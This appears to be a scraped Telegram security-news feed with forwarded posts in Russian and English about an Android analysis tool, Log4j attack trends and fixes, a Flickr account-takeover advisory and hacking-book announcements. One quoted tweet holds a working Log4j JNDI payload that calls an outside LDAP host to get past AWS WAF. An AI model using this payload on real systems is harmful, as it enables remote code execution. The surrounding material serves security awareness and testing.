Forwarded from HackGit
Aparoid - Static and dynamic #Android application #security analysis.
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
GitHub
GitHub - stefan2200/aparoid: Static and dynamic Android application security analysis
Static and dynamic Android application security analysis - stefan2200/aparoid
Forwarded from LeakInfo
Некоторые злоумышленники, использующие уязвимость Apache #Log4j, переключились с URL-адресов обратного вызова LDAP на RMI или даже использовали их одновременно.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
https://twitter.com/11xuxx/status/1471826191724257285?t=uud1PH6uYJEnH7H4CQILNg&s=19Вот кстати пример, как обходят AWS WAF, поэтому и нужны фиксы на всех точках возможных атак
Twitter
xxux11 ᯲ ̸
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF
очередная уязвимость и выпуск 2.17 версии, чтоб защититься от DoS атаки через log4j
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
BleepingComputer
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes…
https://twitter.com/therceman/status/1470768985302048774
https://therceman.medium.com/log4j-vulnerability-cheatsheet-66b7aeabc607
https://therceman.medium.com/log4j-vulnerability-cheatsheet-66b7aeabc607
Twitter
Anton
Bug Bounty Tip :: Log4j Vulnerability Cheatsheet 🔹 How It Works 🔹 Test Environments 🔹 Challenges & Labs (Rooms) 🔹 Where Payloads can be Injected 🔹 What Information can be Extracted 🔹 How To Identify (Services & Scanners)
https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/
Интересный баг, связанный с неправильной имплементацией механизма аутентификации через AWS Cognito, позволяющий залогиниться в любой аккаунт.
Интересный баг, связанный с неправильной имплементацией механизма аутентификации через AWS Cognito, позволяющий залогиниться в любой аккаунт.
(Web-)Insecurity Blog
Flickr Account Takeover
This post gives a deep dive into a critical security flaw that was present in Flickr’s login flow.
The authentication at identity.flickr.com is implemented using AWS Cognito. By exploiting configuration issues and violations of the OpenID Connect specification…
The authentication at identity.flickr.com is implemented using AWS Cognito. By exploiting configuration issues and violations of the OpenID Connect specification…
Forwarded from Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
Name: Bug Bounty Hunting for Web Security
Author: Sanjib Sinha
Year: 2019
Start with the basics of bug hunting and learn more about implementing an offensive approach by finding vulnerabilities in web applications. Getting an introduction to Kali Linux, you will take a close look at the types of tools available to you and move on to set up your virtual lab.
You will then discover how request forgery injection works on web pages
and applications in a mission-critical setup. Moving on to the most challenging task for any web application, you will take a look at how cross-site noscripting works and find out about effective ways to exploit it.
Скачать.
Author: Sanjib Sinha
Year: 2019
Start with the basics of bug hunting and learn more about implementing an offensive approach by finding vulnerabilities in web applications. Getting an introduction to Kali Linux, you will take a close look at the types of tools available to you and move on to set up your virtual lab.
You will then discover how request forgery injection works on web pages
and applications in a mission-critical setup. Moving on to the most challenging task for any web application, you will take a look at how cross-site noscripting works and find out about effective ways to exploit it.
Скачать.
Forwarded from Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
Name: Bug Bounty Automation With Python: The secrets of bug hunting.
Author: Syed Abuthahir
This book demonstrates the hands-on
automation using python for each topic mentioned in the table of contents.
This book gives you a basic idea of how to automate something to reduce the
repetitive tasks and perform automated ways of OSINT and
Reconnaissance.This book also gives you the overview of the python
programming in the python crash course section. This book is the first part of
bug bounty automation with python series.
Скачать.
Author: Syed Abuthahir
This book demonstrates the hands-on
automation using python for each topic mentioned in the table of contents.
This book gives you a basic idea of how to automate something to reduce the
repetitive tasks and perform automated ways of OSINT and
Reconnaissance.This book also gives you the overview of the python
programming in the python crash course section. This book is the first part of
bug bounty automation with python series.
Скачать.
Forwarded from S.E.Reborn
Ethical_Hacking_A_Complete_Guide_With_Tips_and_Tricks_Find_out_about.epub
4.3 MB
📖 Ethical Hacking: A Complete Guide With Tips and Tricks.
• Дата выхода: 25 Декабря 2021 года.
• Рейтинг: ⭐️⭐️⭐️⭐️(4 out of 5)
• Подробное описание книги.
• VT.
🧩 Софт для чтения.
#Eng #Hack
• Дата выхода: 25 Декабря 2021 года.
• Рейтинг: ⭐️⭐️⭐️⭐️(4 out of 5)
• Подробное описание книги.
• VT.
• This book contains numerous examples of various attacks and some exercises that you can use when performing these attacks for the first time. It is critical to remember that ethical hacking is quickly becoming one of the most in-demand professions because every organization is looking for a way to protect their data.🧩 Софт для чтения.
#Eng #Hack
Forwarded from itsecforu (Информационная безопасность)
🕵️♂️ Тестирование безопасности веб-приложений своими cилами
В связи с ростом числа всевозможных кибератак разумно инвестировать свое время в создание мер по безопасности веб-приложений.
Поэтому не менее важно вкладывать средства в тестирование безопасности веб-приложений, поскольку агентства, организации и компании все больше осознают постоянно присутствующие угрозы безопасности веб-приложений.
Читать
В связи с ростом числа всевозможных кибератак разумно инвестировать свое время в создание мер по безопасности веб-приложений.
Поэтому не менее важно вкладывать средства в тестирование безопасности веб-приложений, поскольку агентства, организации и компании все больше осознают постоянно присутствующие угрозы безопасности веб-приложений.
Читать